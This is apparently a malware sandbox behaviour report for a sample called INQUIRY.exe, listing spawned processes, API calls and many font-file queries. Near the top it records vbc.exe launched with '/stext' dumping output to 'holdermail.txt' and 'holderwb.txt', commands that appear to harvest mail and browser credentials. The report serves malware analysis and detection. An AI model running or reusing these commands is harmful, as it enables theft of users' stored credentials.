                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,GetACP,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,GetACP,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,GetACP,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
